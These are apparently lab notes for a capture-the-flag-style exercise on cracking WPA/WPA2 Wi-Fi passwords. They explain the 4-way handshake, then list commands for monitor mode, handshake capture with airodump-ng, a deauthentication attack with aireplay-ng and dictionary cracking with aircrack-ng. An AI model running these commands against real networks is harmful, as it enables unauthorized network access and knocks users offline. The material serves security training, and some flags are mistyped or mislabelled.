WPA/WPA2 Cracking

The 4 way handshake

  • Router sends a challenge: The router (or access point) sends a challenge” to the client, asking it to prove it knows the network’s password without directly sharing it.
  • Client responds with encrypted information: The client takes this challenge and uses the PSK to create an encrypted response that only the router can verify if it also has the correct PSK.
  • Router verifies and sends confirmation: If the router sees the client’s response matches what it expects, it knows the client has the right PSK. The router then sends its own confirmation back to the client.
  • Final check and connection established: The client verifies the router’s response, and if everything matches, they finish setting up the secure connection

Preparation

  1. iw dev — this will show any wireless devices and their configuration.
  2. sudo iw dev wlan2 scan — this will scan nearby wifi networks
  3. sudo ip link set dev wlan2 down — turns device off
  4. sudo iw dev wlan2 set type monitor — Changes wlan2 to monitor mode
  5. sudo ip link set dev wlan2 up — turns device back on

Capturing handshake

  1. sudo airodump-ng wlan2 — start capturing WPA handshakes
  2. Cancel scan once you locate
  3. sudo airodump-ng -c 6 –bssid 02:00:00:00:00:00 -w output-file wlan2 — use the data you received from your scan. use the channel and BSSID. The output file is used to crack the password

Launching a Deauth attack

  1. sudo aireplay -ng -0 1 -a 02:00:00:00:00:00 -c 02:00:00:00:01:00 wlan2
    • -0 indicates the deauth attack
    • 1 value is the number of deauths to send
    • -a indicates the BSSID
    • -c  BSSID of the client to deauthenticate

Cracking WPA/WPA2 password

  1. sudo aircrack-ng -a 2 -b 02:00:00:00:00:00 -w /home/glitch/rockyou.txt output*cap
    • -a 2 — indicates attack mode
    • -b indicates the bssid of the access point
    • -w indicates the dictionary list to use for the attack